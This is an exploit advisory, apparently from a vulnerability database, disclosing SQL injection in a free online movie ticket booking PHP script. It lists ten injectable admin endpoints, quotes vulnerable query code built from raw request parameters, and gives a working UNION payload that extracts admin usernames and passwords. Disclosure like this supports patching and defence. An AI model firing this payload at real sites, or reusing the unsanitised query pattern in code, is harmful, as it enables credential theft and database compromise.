Online Movie Ticket Booking - SQL injection

2021.06.09
us Mostafa Farzaneh (US) us
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Online Movie Ticket Booking - SQL injection # Date: 2021-06-04 # Exploit Author: Mostafa Farzaneh # Vendor Homepage: https://github.com/vydyas # Software Link: https://github.com/vydyas/Online-Movie-Ticket-Booking-Script-Free # Tested on: Ubuntu # Version: 1.00 # This web application contains several SQL injection vulnerabilities in the following paths: http://localhost//admin/agent-login.php?username=&password= http://localhost/admin/get_ticket.php?ticketid= http://localhost/admin/edit_theatre.php?id= http://localhost/admin/get_movie.php?loc_id= http://localhost/admin/get_agents.php?loc_id= http://localhost/admin/get_movie_timings.php?movie_id=&loc_id= http://localhost/admin/addmovies_process.php?movie_name= http://localhost/admin/delete.php?id= http://localhost/admin/get_customer_booking.php?clocation=&ctheatre= http://localhost/admin/add_agent_process.php?theatre_name= # PoC : - Vulnerable code: get_customer_booking.php: $sql = "select * from assign_show where fk_location_id = '$clocation' and fk_theater_id = '$ctheatre'"; $clocation = $_REQUEST['clocation']; $ctheatre = $_REQUEST['ctheatre']; add_agent_process: $query1 = mysql_query("SELECT * FROM agent WHERE username='$theatre_name' "); $theatre_name = $_POST['theatre_name']; delete.php: $sql = "delete from location where id='$id'"; $id = $_GET['id']; addmovies_process.php: $query1 = mysql_query("SELECT * FROM movies WHERE name='$movie_name' "); $movie_name = $_POST['movie_name']; get_movie_timings: $sql1 = "select * from theatres where movies_id = '$movie_id' and location_id='$loc_id'"; $movie_id = $_REQUEST['movie_id']; $loc_id = $_REQUEST['loc_id']; get_agents.php: $sql = "SELECT * FROM agent where fk_location_id=$loc_id "; $loc_id = $_REQUEST['loc_id']; get_movie.php: sql = "SELECT movies.name,movies.id,todate FROM assign_show join movies on assign_show.fk_movie_id = movies.id where assign_show.fk_location_id='$loc_id' order by movies.id desc"; $loc_id = $_REQUEST['loc_id']; edit_theatre.php: query = mysql_fetch_array(mysql_query("SELECT * FROM theatres WHERE id='$id'")); $id = $_REQUEST['id']; agent-login.php: $query = mysql_query("select * from agent where username='$username' and password='$password'") loginagent($username, $password) loginagent($username, $password) get_ticket: $sql1 = "select customer_details.cust_id,customer_details.name,customer_details.email,customer_details.mobile from customer_booking join customer_details on customer_booking.fk_cust_id = customer_details.cust_id where fk_cust_id = '$ticket' group by fk_cust_id"; $ticketid = $_REQUEST['ticketid']; - Payload: http://localhost/get_movie_timings?movie_id='+union+select+1,group_concat(username,':',password) from admin-- -&loc_id= ********************************************************* #Discovered by: Mostafa Farzaneh #Telegram: @pyweb_security *********************************************************


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top